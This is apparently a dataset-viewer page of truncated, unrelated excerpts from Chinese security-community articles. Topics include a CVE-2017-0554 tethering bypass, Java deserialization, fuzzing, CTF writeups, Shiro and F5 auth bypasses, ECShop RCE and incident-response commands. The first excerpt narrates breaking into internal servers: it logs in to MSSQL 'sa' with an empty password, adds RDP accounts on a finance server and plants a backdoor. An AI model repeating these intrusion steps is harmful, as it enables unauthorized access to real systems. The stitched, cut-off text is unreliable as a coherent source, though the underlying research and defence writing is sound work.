**,楼层总共为19层,所以为19** ,扫描结果如下:
* * *
**ipc 弱口令的就不截登录图了,我们看mssql 弱口令,先看10.10.9.1 _,sa_ 密码为空我们执行**
**执行一下命令看看**
* * *
**开了3389 ,直接加账号进去**
* * *
**一看就知道是财务系统的服务器,我们千万不能搞破坏呀,看看另一台如图**
* * *
**直接加个后门,**
* * *
**有管理员进去了,我就不登录了,以此类推拿下好几台服务器... | 社区文章 |
# Tethr:安卓网络共享服务开通状态检查绕过漏洞(CVE-2017-0554)
##### 译文声明
本文是翻译文章,文章原作者 lanrat,文章来源:lanrat.com
原文地址:<https://lanrat.com/tethr/>
译文仅供参考,具体内容表达以及含义原文为准。
>
> 在绝大多数未Root且使用原厂(Stock)ROM的安卓手机上,当我们启用网络共享(Tethering,官方介绍请参见:[https://support.google.com/nexus/answer/2812516?hl=en](https://support.google.com/nexus/answer/2812516?hl=en... | 社区文章 |
# 【技术分享】你所知道的PHP中的公钥加密是错误的
|
##### 译文声明
本文是翻译文章,文章来源:paragonie.com
原文地址:[https://paragonie.com/blog/2016/12/everything-you-know-about-public-key-encryption-in-php-is-wrong?utm_source=tuicool&utm_medium=referral](https://paragonie.com/blog/2016/12/everything-you-know-about-public-key-encryption-in-php-is-wrong?utm_sourc... | 社区文章 |
# Java反序列化和集合之间的渊源
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 0x01 前言
从一开始接触Java序列化漏洞就经常看到以Java集合作为反序列化入口,但是也没有仔细思考过原因。分析的Gadget多了觉得很多东西有必要总结一下,所以有了本篇文章。
分析过ysoserial的同学应该经常会遇到将HashMap、HashSet、PriorityQueue等Java集合作为反序列化入口的情况,总结了下大致如下:
反序列化载体 | Gadget
---|---
HashMap | Clojure、Hibernate1、Hibernate2、JSON1、Myfaces... | 社区文章 |
**作者:此彼
公众号:[蚂蚁安全实验室](https://mp.weixin.qq.com/s/1q_YCJoyCREtgU3X2_0uqQ)**
近日,蚂蚁安全天穹实验室安全专家吴潍浠在国际安全会议 **Hack In The Box Singapore** 上分享了议题
**《探索先进自动化漏洞挖掘技术中的不足》** 。
议题通过几个具有特殊逻辑的演示代码,揭示出AFL、libFuzzer、KLEE、QSYM等几款传统自动化漏洞挖掘工具,在某些特定程序逻辑下存在的无法高效覆盖的问题。
议题同时提出“ **约束反向传播**
”的新思路,并用demo证明在某些特定程序逻辑的漏洞挖掘工作中,新方法能够大大提升Fuzz的效率和覆盖... | 社区文章 |
**本文来自i春秋作者**
:[penguin_wwy](http://bbs.ichunqiu.com/thread-13913-1-1.html?from=seebug)
注:文中示例代码,可以在以下链接查看完整版:http://bbs.pediy.com/showthread.php?t=191649)
#### 【预备起~~~】
最近在忙找工作的事情,笔试~面试~笔试~面试。。。很久没有写(pian)文(gao)章(fei)。忙了一阵子之后,终于
~~~到了选offer的阶段(你家公司不是牛吗,老子不接你家offer,哈哈哈哈~~
~),可以喘(出)口(口)气(恶)了(气)。。。来来来,继续讨论一下抗静态分析的问题,这回要说... | 社区文章 |
给予小白去参加攻防演练防守方的一些方法
攻防演练的防御与常规的黑客防御不同。防御、检测、响应、都被大大压缩,种种要求导致攻防演练中的应急响应流程必然与日常存在一定差异。
以下是针对攻防演练个人经验所积累下的防守方应急响应流程,如有文章有错误,请师傅们指出多多担待。
1.对端口进行排查
netstat -ano
找到可疑端口的PID
tasklist | findstr XXXX
查看PID对应的程序
wmic process | findstr "wps.exe"
2.查看计划任务
compmgmt.msc
3.查看进程
tasklist
4.查看是否存在异常启动项
msconfig或打开... | 社区文章 |
## Detail
How to pwn bookhub?
<http://52.52.4.252:8080/>
hint: www.zip
## Writeup
### 0x01 Bypass IP
太垃圾了了,一开始掉进了XFF的坑里
**./bookhub/forms.py**
class LoginForm(FlaskForm):
username = StringField('username', validators=[DataRequired()])
password = PasswordField('password', validators=[DataRequired... | 社区文章 |
# 2018 SECCON CTF—GhostKingdom Writeup
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
SECCON CTF的这WEB题比较有趣,结合了CSS注入和GhostScript的RCE,都是比较新的东西,现将过程整理和记录作为分享和总结:
## 0x01 探索功能与初步思路
访问题目,首先是提示了FLAG所在路径就是./FLAG/
点击进入TOP后,进入到一个登录页面,具有基础的登录和注册功能
经过测试,登录和注册功能不存在SQL注入,于是尝试注册账号并且登录,登录后页面内容如下:
登录的用户提供了两个功能,分别是给管理员留言,以及远程访问一个URL并... | 社区文章 |
# 如何攻击智能汽车远程启动系统(Part 1)
|
##### 译文声明
本文是翻译文章,文章来源:versprite.com
原文地址:<https://versprite.com/blog/hacking-remote-start-system/>
译文仅供参考,具体内容表达以及含义原文为准。
## 一、前言
关于汽车安全方面的研究趋势始于2010年,到目前为止,研究人员已经在汽车中发现了多个严重安全问题。
黑客们经常向公众展示他们有能力远程跟踪、窃取和控制未经改装的各种汽车的能力,在大多数情况下,厂商可以向受影响的汽车软件推送远程更新来修复这些问题,但很少有人去关注修复[严重漏洞](https://versprite.com... | 社区文章 |
# python http.server open redirect vulnerability
(本文来自 <https://www.leavesongs.com/PENETRATION/python-http-server-open-redirect-vulnerability.html> 支持一下先知论坛的改版~)
Github账号被封了以后,Vulhub也无法继续更新了,余下很多时间,默默看了点代码,偶然还能遇上一两个漏洞,甚是有趣。
这个漏洞出现在python核心库http中,发送给官方团队后被告知撞洞了,且官方也认为需要更多人看看怎么修复这个问题,所以我们来分析一下。
## 0x01 http.server库简单分析
众... | 社区文章 |
# InsecurePowerShell:不用类库System.Management.Automation
##### 译文声明
本文是翻译文章,文章原作者 cobbr,文章来源:cobbr.io
原文地址:<https://cobbr.io/InsecurePowershell-PowerShell-Without-System-Management-Automation.html>
译文仅供参考,具体内容表达以及含义原文为准。
>
> 长期以来,大家可能认为PowerShell实际上就是System.Management.Automation.dll,但我们在这里将介绍不使用该类库前提下的PowerShell脚本执行方法,具体... | 社区文章 |
# 【技术分享】深入分析REDBALDKNIGHT组织具备隐写功能的Daserf后门
|
##### 译文声明
本文是翻译文章,文章来源:trendmicro.com
原文地址:<http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/>
译文仅供参考,具体内容表达以及含义原文为准。
译者:[shan66](http://bobao.360.cn/member/contribute?uid=2522399780)
预估稿费:200RMB
... | 社区文章 |
# 在比特币网络中通过Sybil进行双花攻击(上)
|
##### 译文声明
本文是翻译文章,文章原作者 Shijie Zhang,Jong-Hyouk Lee,文章来源:ieeexplore.ieee.org
原文地址:<https://ieeexplore.ieee.org/abstract/document/8733108>
译文仅供参考,具体内容表达以及含义原文为准。
双花攻击是大多数区块链系统中的主要安全问题之一,但除非对手具有强大的计算能力,否则很难成功发起攻击。在本文中介绍了一种新的攻击模型,该模型将双花攻击与Sybil攻击(女巫攻击)结合在一起。
## 0x01 Introduction
比特币是中本聪在2008年创... | 社区文章 |
**作者:fate0
来源:<http://blog.fatezero.org/2018/03/05/web-scanner-crawler-01/> **
**相关阅读:
[《爬虫 JavaScript 篇[Web 漏洞扫描器]》](https://paper.seebug.org/570/ "《爬虫 JavaScript
篇\[Web 漏洞扫描器\]》")
[《爬虫调度篇[Web 漏洞扫描器]》](https://paper.seebug.org/730/ "《爬虫调度篇\[Web 漏洞扫描器\]》")
[《漏洞扫描技巧篇 [Web 漏洞扫描器]》](https://paper.seebug.org/1018/ ... | 社区文章 |
本文将详细介绍一款基于python编写的,能够将代码插桩与覆盖率运用到对程序进行模糊测试的FUZZER: EPF。
该工具对应的论文发表在CCF-B级会议PST上,将从实验和原理分析两部分介绍此工具。实验部分将介绍epf的安装以及对工控协议IEC104库的fuzz,原理部分将依据论文介绍epf的实现。
# 实验
## 工具的安装
从源代码的目录结构中可以发现EPF的覆盖率主要基于AFL++的插桩工具afl-clang-fast,对于AFL++的介绍请参考我这篇关于AFL++的原理介绍的文章。
因此:
### 1、安装AFL++
安装步骤可参考:<https://github.com/AFLplusplus/AFLpluspl... | 社区文章 |
**作者:启明星辰ADLab
原文链接:<https://mp.weixin.qq.com/s/WMFkPJOd29yOiGoC92QFJA>**
### 一、漏洞背景
近期,国外安全研究人员在oss-security上披露了一个AF_VSOCK套接字条件竞争高危漏洞CVE-2021-26708(CNVD-2021-10822、CNNVD-202102-529)。根据披露细节,该漏洞是由于错误加锁导致,可以在低权限下触发并自动加载易受攻击驱动模块创建AF_VSOCK套接字,进而导致本地权限提升。该漏洞补丁已经合并到Linux内核主线中。
### 二、VSOCK介绍和架构
#### 2.1 VSOCK介绍
VM套接字最早是由Vmw... | 社区文章 |
# 【技术分享】利用威胁情报数据平台拓展APT攻击线索一例
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
**简介**
****
当我们说起APT攻击线索的发现,似乎是一个挺神秘的事,安全厂商往往说得云山雾罩,如果现在你问如何知道某件事情的时侯,得到的回答往往是:”嗯,我们用了机器学习”,行业外的人除了觉得高端以外基本得不到有用的信息。然而,发现高级的定向攻击是否一定需要高级的分析手段?答案是:未必。今天我们就举一个简单的例子,分析对象还是我们的老朋友:
**海莲花APT团伙** 。
**线索**
****
2017年5月14日FireEye公司发了一个揭露 **APT32... | 社区文章 |
# 网络招嫖诈骗产业流程及风险分析
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
近期,360手机先赔收到用户反馈,在网络招嫖过程中被骗5100元。通过对类似诈骗手法的分析汇总,可以看出网络招嫖诈骗流程化,大致分为引流、切客、诱导支付三个环节。
## 网络招嫖诈骗流程
**引流**
在色情网站发帖或者进行资源板块交换,发布会所信息、服务项目等。
**切客**
通过QQ、微信等聊天软件沟通,或引导客户安装指定的聊天软件,部分使用的加密聊天软件通常呈现以下这些特征:
**提供可选服务**
**方式1:** 在加密聊天中,向客户提供服务信息,索要客户地址。引流客户添加小妹名片,客服讲解服务内容并引导交... | 社区文章 |
**作者:启明星辰ADLab
原文链接:<https://mp.weixin.qq.com/s/OwQ3B5vjpr9ZsvOXftJoQg>**
### 一、漏洞概述
4月7日,seongil-wi在github上披露了Node.js模块 vm2
的沙箱逃逸漏洞(CVE-2023-29017),CVSSv3评分为10.0,漏洞定级为严重,影响版本为3.9.14之前。随后Xion又在修复的vm2
3.9.15版本中披露了同级别的另一沙箱逃逸漏洞(CVE-2023-29199)。启明星辰ADLab在第一时间对漏洞进行了分析并给出修复建议。沙箱对Node.js
宿主对象的操作进行代理,以达到在Node.js 中执行受信任的代码。如果... | 社区文章 |
# 64位 Android Native病毒——“假面兽”开始蔓延
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 一、背景
360安全大脑首次披露:兼容安卓64位的Android
Native病毒——“假面兽”,其伪装手机系统文件、更新频繁,遂将其命名为“假面兽”病毒,感染总量达80万。该病毒目前处于活跃阶段,其利用加密混淆、HOOK和感染手机系统文件等多种技术手段,在中招用户手机上进行恶意推广、篡改系统文件、获取非法利益,将用户手机变成广告和垃圾APP的“乐园”,同时窃取用户的钱财。
“长老木马”、“百脑虫”、“地狱火”等病毒家族是32位Android
Native病毒泛滥潮的元凶,随着... | 社区文章 |
萌新入坑pwn,一直在做栈溢出的题目,这题集合了__libc_csu_init,覆写got表,mmap和mprotect的运用,知识点丰富,在此做个总结,和学pwn的同学一起进步,大佬也请过过目,指正下不足之处,向大佬们看齐,题目,libc版本和exp都放在附件中,请自取。
下面进入正题,这里假设system和execve被禁用,实际上这种情况很常见,利用mprotect和mmap来解决,简单来说mmap函数创建一块内存区域,将一个文件映射到该区域,进程可以像操作内存一样操作文件。mprotect函数可以改变一块内存区域的权限(以页为单位),这里通常把bss的权限改为可读可写可执行,一般来说64位下mprotect(0x600000... | 社区文章 |
# 一. 前言
在电视剧中,经常看到这样的场景:男主与女主相亲相爱结婚后生下一可爱的孩子,谁知男主遇见小三后移情别恋并最终与小三一起,时隔多时,发现孩子得了血液类疾病,耐何亲父血型不配型,无奈只好求助孩子亲生母亲…………多么熟悉的电影场景,如今却在勒索软件身上上演。
在2017年1月,新型的加密勒索软件以Sega之姿重出江湖,这款新型勒索软件的加密方式正如上面描述的电影场景一般。加密过程涉及三方角色:入侵者(相当于女主),系统(相当于男主)与文件(相当于小三)。加密时,本来入侵者与系统通过curve25519协商出的共享密钥(相当于孩子),却被系统带走与文件(小三)一起使用(生活),最后被加密过的文件系统拥有的密钥无法解开(相当孩子... | 社区文章 |
# MySQL8新特性注入技巧
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 新增的表
information_schema.TABLESPACES_EXTENSIONS
> 从mysql8.0.21开始出现的, `table` 关键字出现的比较早,在8.0.19之后就有了,所以如果想要使用,还是先要试试这个表有没有,如果
> mysql 版本正好在 8.0.19-8.0.21 之间的话,就无法使用了
这个表好用就好用在,它直接存储了数据库和数据表
mysql> table information_schema.TABLESPACES_EXTENSIONS;
+----... | 社区文章 |
# 如何使用EternalRomance获得Windows Server 2016上的Meterpreter会话
##### 译文声明
本文是翻译文章,文章来源:exploit-db.com
原文地址:<https://www.exploit-db.com/docs/42329.pdf>
译文仅供参考,具体内容表达以及含义原文为准。
译者:[興趣使然的小胃](http://bobao.360.cn/member/contribute?uid=2819002922)
预估稿费:200RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
**一、前言**
****
当微软发布了MS17-010漏洞的补丁时,人们... | 社区文章 |
### 前言
本文分析 `Vault 7` 中泄露的 `RouterOs` 漏洞。漏洞影响 `6.38.5` 以下的版本。
What's new in 6.38.5 (2017-Mar-09 11:32):
!) www - fixed http server vulnerability;
文中涉及的文件:
链接: <https://pan.baidu.com/s/1i5oznSh> 密码: 9r43
### 正文
**补丁对比 &&漏洞分析**
首先我们先来看看漏洞的原理,漏洞位于 `www` 文件。
我们需要拿到 `www` 文件, 直接用 `binwalk` 提取出 `router os` 镜像文件的所有内容。... | 社区文章 |
[TOC]
### 0x00 题目分析
本题考查Gadget链的挖掘。题目中给的lib库中存在CommonsBeanutils这条链,根据ysoserial中的代码可知这条链的几个关键节点如下:
PriorityQueue.readObject() -> BeanComparator.compare() -> TemplatesImpl.getOutputProperties() -> rce
然而本题的jdk版本是1.4,不存在`PriorityQueue`和`TemplatesImpl`类。也就是说这条链的反序列化入口和执行rce的点都没了。年轻的我看到这里以为可能不是这条链,就略过了。然而这正是这道题的考点。
### ... | 社区文章 |
**作者:Spoock
博客:<https://blog.spoock.com/2020/05/09/cve-2020-1957/>**
**本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org**
### 环境搭建
根据 [Spring Boot 整合 Shiro
,两种方式全总结!](https://segmentfault.com/a/1190000019440231)。我配置的权限如下所示:
@Bean
ShiroFilterFactoryBean shiroFilterFactoryBean() {
ShiroFilt... | 社区文章 |
#### 简述
在开始之前,简单说下为什么混了一篇这样的文章。这几天又有个Cobalt
strike的特征被找了出来,在不久之前也有类似的,其实这样的特征CS有不少,而本文就是记录我是如何利用简单的技术规避这些溯源风险的过程。我简单的认为C2的做好被动式(比如受控端与C2的交互泄露的地址等)以及主动式(比如这类主动式扫描C2特征指纹等)的信息隐藏。
可以理解本文就是专门记录我是如何不修改cobalt strike的class文件,做到隐藏其所有特征的流水账。
#### agent交互信息隐藏
关于这个点,已经有无数大牛用无数思路写了无数的文章了。
包括但不仅限于:
这里我使用一个成本最低、搭建周期最短的方法--`Doma... | 社区文章 |
# 预警
2018年9月1日,阿里云态势感知发布预警,近日利用ECShop全系列版本的远程代码执行漏洞进行批量化攻击量呈上升趋势,该漏洞可直接导致网站服务器沦陷,黑客可通过WEB攻击直接获得服务器权限,利用简单且危害较大。因此,阿里云安全专家提醒ECShop系统用户及时进行修复。
早在1个月前阿里云态势感知就捕获到利用ECShop远程代码执行漏洞进行攻击的真实案例,由于当时该漏洞被利用进行攻击的量不大,阿里云安全团队在做好防御此类漏洞大规模利用攻击的同时,也持续监控该漏洞的利用趋势。
本文对此漏洞的原理,漏洞攻击利用实例以及影响做了全面分析。在官方补丁没放出之前,建议受影响用户可参考文中的修复建议,及时进行修复。使用阿里云WAF的客... | 社区文章 |
**作者:且听安全
原文链接:<https://mp.weixin.qq.com/s/DR0RGE0lhBjBIF3TbDLhMw>**
## 漏洞信息
F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。2022年5月4日,F5官方发布安全通告,修复了一个存在于BIG-IP iControl REST中的身份验证绕过漏洞。漏洞编号:CVE-2022-1388,影响版本如下:
## 环境搭建
下载v15.x系列:
首次运行需要修改密码:
## 进程分析
为了更加方便理解漏洞原理,下面首先简要分析下 F5 BIG-IP iControl 相关进程。
查看 443 端口对应 Ap... | 社区文章 |
# PWN堆溢出技巧:ORW的解题手法与万金油Gadgets
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
> 现在PWN越来越卷,很多题目都有沙箱,需要ORW来读flag,本文以MAR DASCTF
> 2021中的ParentSimulator为例,由复杂到简单介绍几种ORW类题目的解题手法,以及一些好用的Gadgets,
> 此文主要面向和笔者一样的新手pwn师傅, 大佬请无视 XD
## ORW
`ORW`类题目是指程序开了沙箱保护,禁用了一些函数的调用(如 `execve`等),使得我们并不能正常 `get
shell`,只能通过`ROP`的方式调用`open`, `read`, `... | 社区文章 |
# 细谈微隔离
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
>
> 在越来越关注攻防对抗实战防护能力的今天,在零信任网络被炒的越来越热的今天,我们重新审视按照这些新理念构建的纵深防御体系,结果发现依然问题重重:在堆砌了大量安全产品后依然发现在资产管理、漏洞安全运营到内部隔离等基础安全工作跟不上安全态势的变化。就拿隔离来说,当攻击者有机会拿到内网一个跳板机,结果发现内网网络基本是畅通的;这两年的HW攻防对抗演练活动中这个问题的暴露尤为明显,原来奉行的内网基本安全的策略在攻防对抗中被“打”的体无完肤;同时随着内部网络的架构从传统的IT架构向虚拟化、混合云和容器化升级变迁,结果发现内部隔离不再是一件... | 社区文章 |
## 前言
一个比较简单的国外的车辆信息发布管理系统,看到有人还提了CVE就简单的看了下。记录下存在的两类洞sql注入和未授权文件上传,其中sql注入存在多处以下只记录了一处。
## 一、未授权文件上传
**代码漏洞位置** :
`\admin\admin_class.php` ,第282-309行`save_car()`函数,如下所示:
function save_car(){
extract($_POST);
$data = "";
foreach($_POST as $k => $v){
if(!in_array($... | 社区文章 |
# 浅谈PSEXEC做的那些事
##### 译文声明
本文是翻译文章,文章原作者 酒仙桥6号部队,文章来源:酒仙桥6号部队
原文地址:[https://mp.weixin.qq.com/s/HOck5KYFGrVvCxrRCtrnHw?scene=1&clicktime=1605689373&enterid=1605689373](https://mp.weixin.qq.com/s/HOck5KYFGrVvCxrRCtrnHw?scene=1&clicktime=1605689373&enterid=1605689373)
译文仅供参考,具体内容表达以及含义原文为准。
#
在某个游戏的夜晚,兄弟找我问个工具,顺手聊到PsExec的... | 社区文章 |
# 【技术分享】基于COM对象MMC20.Application的横向运动
|
##### 译文声明
本文是翻译文章,文章来源:enigma0x3.net
原文地址:<https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/>
译文仅供参考,具体内容表达以及含义原文为准。
**翻译:**[ **shan66**](http://bobao.360.cn/member/contribute?uid=2522399780)
**预估稿费:100RMB**
******投稿方式:发送邮件至**[ **linwei#36... | 社区文章 |
**本文翻译自:[Hack The Virtual Memory: Python
bytes](https://blog.holbertonschool.com/hack-the-virtual-memory-python-bytes/
"Hack The Virtual Memory: Python bytes")**
# Hack The Virtual Memory: Python bytes
## Hack虚拟内存之第1章:Python 字节对象
在这篇文章中,我们将完成与第0章(C字符串和/proc)几乎相同的事情,但我们将访问正在运行的Python 3脚本的虚拟内存。它不会(像第0章中)那么直接。
并在此过程中看看P... | 社区文章 |
# 黑产大数据:短信拦截手机黑卡近一年暴增30倍
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
这是永安在线黑灰产研究报告的系列文章中的一篇,本文介绍了短信拦截手机黑卡近期的增长趋势与其背后的深层次原因,并分享了永安在线在判别短信拦截手机黑卡背后控制者的经验与方法。本文由永安在线原创发布,如需转载、摘抄或利用其他方式使用本文或观点,请与我们联系。
以往我们提到移动端木马的时候,想到的都是关于流量变现的情况:广告弹窗、软件推广。而到了近期,我们发现黑产逐渐转变了思路,不再针对用户的设备自身流量,而将目标转向到用户的手机号进行牟利。
在对不同的移动端木马进行业务风险分析后,我们发现短信木马的变现模式... | 社区文章 |
# 新型DDOS攻击分析取证
|
##### 译文声明
本文是翻译文章,文章来源:360安全播报
原文地址:<https://www.netfort.com/blog/forensic-analysis-of-a-ddos-attack/#.VrLPfPmrShe>
译文仅供参考,具体内容表达以及含义原文为准。
在最近这10天,爱尔兰的服务器和公共网络遭受了大量的DDOS攻击。通过BBC的调查我们发现,这些攻击是从2016年开始逐步上升的。
我们发现,大量的DDOS请求都是通过NTP协议发送的数据包。NTP协议在DDOS攻击里面属于向量攻击。这个有点像DNS。一个标准的NTP协议可以发送一小段数据包,从而得到更大的数据包。
在这篇文... | 社区文章 |
这个漏洞是个典型的栈溢出,主要是使用了不安全的拷贝函数,导致了溢出,随后在公布了POC之后,也在野外看到了攻击样本
1漏洞分析
漏洞位于EQNEDT32.EXE中,这个组件自从编译后已经17年没有变了,会影响当前所有流行的Office版本
我们这里 选用分析的是embedi放出的POC,我们运行后,可以看到完美的弹出了计算器
我们将exploit.rtf
这个rtf文件放入二进制查看工具中可以看到里面的OLE对象,正是这个OLE对象,可以看到设置了OLE对象属性为objupdate
自动更新,这样无需交互,点击文档自动运行,这个对象的objclass 为 Equation.3,即公式编辑器3.0对象
首先通过rtfobj.py将... | 社区文章 |
# 梦中初探域渗透流程
## 0x0 前言
本文主要站在一个萌新的角度,通过在梦中构建虚拟的渗透场景,结合<<内网安全攻防渗透测试指南>>一书内容,记录下常规域渗透的流程和过程中遇到的问题,以及自己的一些思考。
## 0x1 初始环境
梦中的主人公小七已经通过一个小手段获得了一个机器的system控制权限,接下来将从0开始从第一人称的角度记录下小七的渗透思路。
## 0x2 初步信息收集
### 0X2.1 单机手工收集
**1.查看当前网络**
`ipconfig /all`
通过这个命令,我可以获取到一些下面比较有用的信息:
> hostname:pohxxadc
>
> dns. : pohxx.com
>
> IPv4 Ad... | 社区文章 |
## 漏洞发现
> 某OA 老版本中很多 SQL 语句都是直接采用拼接变量的形式,再加上此程序通篇的 gbk
> 编码,因此存在多处宽字节注入。在前辈的此篇[文章](https://www.t00ls.net/viewthread.php?tid=21859&highlight=%E9%80%9A%E8%BE%BEOA)中就提到了利用宽字节注入配合文件包含来
> getshell,遂打算从注入点入手,来看看有没有漏网之鱼。
## 漏洞分析
### 漏洞点一
* getModuleQuickLinkStr( ) 函数中将 $entity_name 直接拼接在字符串中并返回
// webroot\general\cr... | 社区文章 |
## 0x00 前言
攻击者可以通过多种方式在Active Directory中获得域管理员权限, 这篇文章是为了描述当前使用的一些当前热门的内容,
这里描述的技术“假设违规”,攻击者已经在内部系统上获得权限,并获得域用户认证凭据(又称后渗透利用)。
对于大多数企业而言,不幸的事实是,攻击者通常不会花更长时间从普通域用户转到域管理员。受害者的问题是:"这是怎么发生的?"。攻击者经常以鱼叉式的钓鱼电子邮件开始给一个或多个用户发送邮件,使被攻击者能够在目标网络中的计算机上运行他们的代码。一旦攻击者的代码在企业内部运行,第一步是进行信息收集,以发现有用的资源来进行提权、持久性攻击,当然,还包括截取信息。
虽然整个过程细节各不相同,... | 社区文章 |
## 前言
上一篇文件分析了`DA14531`从收包中断开始一直到`L2CAP`层的数据包处理过程,最近又抽了一点时间将L2CAP层和`ATT`层收包的过程梳理了一遍,本文将结合BLE的协议规范和代码介绍`ATT`层的报文解析流程,并介绍一下分析过程中发现的一些漏洞。
## 回顾
从上文可知 `hci_acl_data_rx_handler` 用于处理L2CAP的报文,该函数首先会调用 `l2cc_pdu_unpack`
对L2CAP的头部字段进行简单的检查,其实就是检查`Length`和`Channel ID`是否合法
然后将`L2CAP`的报文拷贝到新分配的内存,最后根据数据包的类型通过消息机制将数据交给`sub_7F135F6... | 社区文章 |
# 深入理解win32(六)
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
我们在上一节通过跟入od破解了一个简单的小程序以及了解了如何提取图标和寻找标题在资源文件中的位置,其中资源部分的一个重要的结构 —
资源表。在pe结构中最复杂的一个表便是资源表,在win32层面我们要做的操作其实都离不开pe结构,所以在这里我们首先要对pe文件中几个重要的表进行了解并用代码进行解析,这一节我们首先了解的是导出表和重定位表。
## 导出表
导出表的基本概念如下:
> 导出表是PE文件为其他应用程序提供自身的一些变量、函数以及类,将其导出给第三方程序使用的一张清单,里面包含了可以导出的元素。
... | 社区文章 |
## 概述
本系列文章重写了java、.net、php三个版本的一句话木马,可以解析并执行客户端传递过来的加密二进制流,并实现了相应的客户端工具。从而一劳永逸的绕过WAF或者其他网络防火墙的检测。当然,截止到今天,这三个版本一句话木马也是可以绕过基于主机的各种文件特征检测防护系统的,比如安全狗、D盾以及各种杀毒软件。本来是想把这三个版本写在一篇文章里,过程中发现篇幅太大,所以分成了四篇,分别是:
利用动态二进制加密技术实现新型一句话木马之Java篇
利用动态二进制加密技术实现新型一句话木马之.NET篇
利用动态二进制加密技术实现新型一句话木马之php篇
利用动态二进制加密技术实现新型一句话木马之客户端下载及功能介绍
... | 社区文章 |
# 【由浅入深_打牢基础】WEB缓存投毒(上)
## 1\. 什么是WEB缓存投毒
简单的来说,就是利用缓存将有害的HTTP响应提供给用户
什么是缓存,这里借用Burp官方的一张图来说,就是当一个用户去发起一个请求的时候,会经过缓存,但是缓存中如果不存在的话,后端才会响应并将其添加到缓存,之后的用户如果发送等效请求的话,会直接从缓存中获取。
如上所说,那么后端怎么判断我们两个用户的请求是等效的呢?
这里我们要知道一个东西叫缓存键(cache
key),预先定义的请求头中的一些键作为缓存键,只要这些缓存键的值一样后端就认为两个包是等效的,那么头部的其它键就称为非缓键了
==所以==我们web缓存投毒都依赖于非缓存键(因为缓存键是后端判... | 社区文章 |
[TOC]
## 简介
* 本文主要研究PHP的GET/POST/COOKIE大变量生成过程,及可能在WAF流量层面绕过的一些TRICKS
* 实验环境:PHP 7.3.4 在FPM模式下运行
* PHP变量处理的主要代码在[main/php_variables.c](main/php_variables.c),调用栈如下:
* 由于代码流程过长,本文不贴出具体代码,但是会在相应地方给出github链接供参考
* PHP示例代码
<?php
echo "get:";
var_dump($_GET);
echo "cookie:";
var_dump($_COOKIE);
... | 社区文章 |
Subsets and Splits
Top 100 EPUB Books
This query retrieves a limited set of raw data entries that belong to the 'epub_books' category, offering only basic filtering without deeper insights.